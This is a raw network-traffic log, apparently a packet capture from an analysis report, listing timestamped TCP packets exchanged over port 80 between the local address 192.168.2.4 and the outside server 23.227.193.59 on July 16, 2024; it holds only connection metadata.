                                                                            Jul 16, 2024 22:29:50.932873964 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.932913065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933029890 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933072090 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933120966 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933135986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933181047 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933300018 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933315039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933329105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933342934 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933357000 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933357954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933384895 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933537960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933552980 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933567047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933582067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933590889 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933598042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933613062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933615923 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933656931 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933859110 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933876991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933890104 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933904886 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933911085 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933919907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933936119 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.933950901 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.933993101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934107065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934122086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934137106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934149027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934149981 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934178114 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934387922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934402943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934422016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934437037 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934446096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934470892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934472084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934509993 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934520006 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934535027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934560061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934582949 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934583902 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934607983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934631109 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934633017 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934655905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934680939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934680939 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934705973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934726954 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934731007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934756041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934773922 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.934782028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.934823036 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935247898 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935271978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935296059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935319901 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935333967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935359001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935383081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935383081 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935408115 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935429096 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935430050 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935453892 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935472965 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935481071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935506105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935524940 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935532093 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935555935 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935576916 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935580969 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935605049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935626030 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935630083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935655117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935678959 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.935681105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935712099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:50.935730934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:50.978555918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018413067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018466949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018522978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018538952 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018554926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018589973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018599987 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018624067 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018660069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018682957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018708944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018743992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018754959 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018795967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018810987 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018826008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.018838882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.018883944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.019035101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019051075 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019102097 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.019517899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019608021 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019623041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019654036 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.019681931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019695997 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019723892 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.019799948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019817114 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019845963 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.019949913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019964933 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019979000 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019994020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.019998074 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020009041 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020035028 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020080090 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020176888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020191908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020256996 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020296097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020311117 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020355940 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020391941 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020406008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020421982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020446062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020642042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020658016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020673037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020688057 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020690918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020704031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020719051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020729065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020734072 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020747900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020764112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.020772934 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020797968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.020828962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.021434069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021517038 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021532059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021573067 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.021610975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021625996 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021641970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021656990 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.021656990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021702051 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.021883965 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021898985 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021907091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021920919 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021935940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021950960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.021951914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.021980047 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022150040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022202015 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022237062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022250891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022264957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022279978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022291899 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022295952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022311926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022320986 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022327900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022358894 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022579908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022595882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022609949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022628069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022634983 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022650003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022658110 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022665024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022680044 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022695065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022696972 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022711992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.022723913 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.022752047 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023058891 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023185968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023200989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023216009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023231030 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023236036 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023246050 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023261070 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023263931 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023276091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023292065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023307085 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023310900 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023333073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023355961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023773909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023796082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023811102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023825884 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023840904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023844004 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023854971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023869991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023885012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023885012 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023900986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023907900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023920059 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023921967 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023942947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023951054 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.023958921 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023972988 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023987055 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.023999929 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024000883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024015903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024040937 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024684906 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024699926 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024713993 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024728060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024741888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024743080 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024756908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024771929 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024786949 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024791956 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024801970 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024817944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024821043 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024832010 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024844885 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.024848938 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.024872065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.072319984 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107497931 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107537031 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107589960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107624054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107659101 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107692957 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107698917 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107727051 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107741117 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107741117 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107764006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107810020 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107810020 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107842922 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.107894897 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.107969046 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108000994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108032942 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108045101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.108067036 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108102083 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108118057 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.108814955 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108869076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108880997 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.108903885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108953953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.108956099 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.108988047 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109020948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109033108 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109055042 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109103918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109114885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109160900 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109194994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109210014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109229088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109273911 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109380960 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109395981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109411001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109425068 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109440088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109441996 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109471083 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109549999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109563112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109592915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109694004 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109709024 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109724045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109735966 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109739065 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109755039 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109769106 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109770060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109797955 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.109978914 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.109992027 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110007048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110023022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110030890 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110035896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110053062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110053062 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110081911 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110136986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110162973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110177040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110184908 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110305071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110708952 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110781908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110799074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:51.110825062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:51.110851049 CEST804973023.227.193.59192.168.2.4
